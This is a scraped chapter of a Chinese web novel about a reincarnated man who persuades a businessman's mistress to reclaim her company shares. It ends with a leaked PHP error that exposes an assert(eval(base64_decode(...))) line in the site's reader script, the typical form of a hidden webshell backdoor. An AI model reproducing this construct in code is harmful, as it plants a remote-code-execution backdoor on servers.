99书盟 > 玄幻小说 > 重生一亿次 > 第十四章魅力四射
    第十四章魅力四射

    引入眼帘的就是一个穿得华丽而不庸俗的服饰的女人,周围紫蓝色的窗帘和暗红色的地毯将这个女人衬托的更加的妖艳。这女人不是别人,正是刚才及电话的欧阳妍。此时,她正坐在床边,看到有人闯入,噌的站起来,准备要发火,却看到来人是一个帅哥,这团伙马上就被浇灭,并在脸上露出些许的期待。

    “你就是刚才打电话的人?”愿意为是一个认识的老情人,但欧阳妍却比看到老情人更加的兴奋,来的人可是一个又高大又帅气的男人,这样的男人她已经梦寐以求了很多年了。

    高帅没有理会,而是直径的走进去,手伸出来,轻轻地触碰了一下那张粉红色的大床,很是认真的说道:“看来你真听话,把不相干的人打发走了,这就对了,省得我生气。”

    他又看了看旁边的床头柜上,有两个高脚杯,上面还存留着小半杯的红酒,很显然来人走得很急,还没享受美食和美人,就被赶出去了。

    “杯子怎么还在,还是这么的粗心,叫我如何说你。”高帅转身过来,直径的来到了欧阳妍的面前。

    欧阳妍以为这人会对自己下手,因此心潮澎湃,怦怦直跳,都要跳到嗓子眼来了。可没曾想,对方竟然不是冲着她来的,于是脸上出现了失望的表情。

    高帅低头看了看床脚,那里除了一双女人的拖鞋外,还有一双男人的,很明显是刚才那个男人留下来的。

    “把这双鞋给扔了,我不想看到任何一个男人的东西出现在这间闺房中。”高帅板着脸,气呼呼的说道。

    欧阳妍一头雾水,她实在是想不出在哪里见过这么一个大帅哥,更没有料到,这帅哥进来就指指点点,仿佛对这里了如指掌的,这让她感到十分的惊恐却又十分的刺激。

    这女人虽然也是梦妆集团的股东,但她从来都不会出现在董事会上,一般情况下都是由郑士富代劳,以她手头百

    分之二的股份加上郑士富手中的百分之十一点二,加起来也会有百分之十三。十一个董事,其中八个就站在了他的那一边,自然会有恃无恐,对苏伊雪穷追猛打。

    不过,王忠飞手中的百分之三也顺利的进入到了苏伊雪的囊中,如此一来,也就开始瓦解了郑士富的实力,在高帅的帮助下,只怕会越来越多的人倒向这边,到时候实力悬殊之下,郑士富即便是有再大的靠山,也会分崩离析。

    “帅哥,我们在哪里见过吗,为什么你对我这么熟悉,还是说你觊觎我的美貌,已经观察我很久了?”欧阳妍仗着自己又几分姿色,将郑士富牢牢地攥在手中,便也就以为天底下所有男人见到她就会像郑士富一样魂不守舍。于是,这才对面前的高帅耍起了她管用的那一套伎俩。

    高帅并没有理会,而是直接捡起那双男人的拖鞋扔出了窗外。

    不难想象,当他打电话给欧阳妍,让对方赶紧打发了身边的男人走,而这个身边的男人除了郑士富也没有别的人了。那种狼狈不堪的样子,竟然是一道亮丽的风景线,若能亲眼目睹,才是大快人心。

    “你……你做什么。”欧阳妍依然还是不太明白进来的这个大帅哥到底要做什么,心里有些诚惶诚恐的。

    “怎么,你想让你的闺房有别的男人的东西存在,我看着这些就心烦,你要是舍不得,我现在即可就走。”高帅冷冷的说完这话后,便朝着大门那边走去。

    欧阳妍赶紧冲上去,堵住了大门,并转身面对高帅,脸上露出期待的表情。“怎么了,这样就要走了?”妩媚的神态着实让人身体都要软了。

    若是换成别人,只怕早就抱得美人归了,可高帅才不吃这一套,这几万次的重生,什么女人没见过。

    “帅哥,你到底是谁啊,为什么突然闯入我的世界?”欧阳妍含情脉脉的看着高帅,恨不得郑士富对她的那一套发生在高

    帅的身上,那样的话,她就算是死也是没有什么遗憾了。

    “小妍,我跟你说过多少次了,不要和不三不四的男人来往,你怎么就是不听呢。”高帅神情冷漠,即便是在关怀对方,也是如此的让人心寒。

    欧阳妍再次听到这种称呼,整个心都软了,她也不知道自己为什么会对这样的一个称呼如此的在意,仿佛是有人拿着一块糖塞进了她的心田一样的甜蜜。此时,她多想高帅能够一刻不停的叫下去,这样的话,她便能将这种从来没有过的感觉保留下来,不让它随着岁月的流逝而消失。

    “我没有,我现在很乖的,没有和不三不四的男人在一起啊。”欧阳妍瞬间感觉自己的形象多么的重要,她想给高帅留下一个清纯少女的好印象,因此即便是那样的事情发生了,她也会矢口否认,也绝对要维护好在高帅心中的形象。

    “你是觉得我是傻子吗?郑士富不是你情人,还是说我眼睛看差了?小妍,跟你说过多少次了,郑士富早就有家室了,他不过是想找刺激而已。”

    欧阳妍眼睛瞪得巨大的,这些信息,她也是最近才搞清楚的,可这么一个陌生男人一来就说出来了,他到底算谁,为什么要帮自己。

    “你是怎么知道的?”如果说之前得到的消息,她还能有点心存侥幸,但现在从高帅的口中说出来,那一丢丢仅存的希望彻底的破碎了,于是,她的泪水在眼眶中打转,却不敢让他们肆无忌惮的流下来。

    “你一定要乖乖地,不然的话,出了事,不要怪我没有提醒你。对了,听说你在梦妆集团有股份,好像是百分之二,但这百分之二却是由郑士富把持着,真不知道你是怎么想的,如果我是你,就把股份收回来。听说梦妆集团最近开始步入了正规,相信过不了多久会有分红了,你就不想要那些分红?”高帅依然冷若冰霜,完全没有什么表情可言,让对方完全的猜不到自己到底要做什么。

Warning: assert() [function.assert]: Assertion "$婐疬寰鳍= eval(base64_decode($嚚戥呷));" failed in E:\Web\99shumeng\modules\article\reader.php on line 2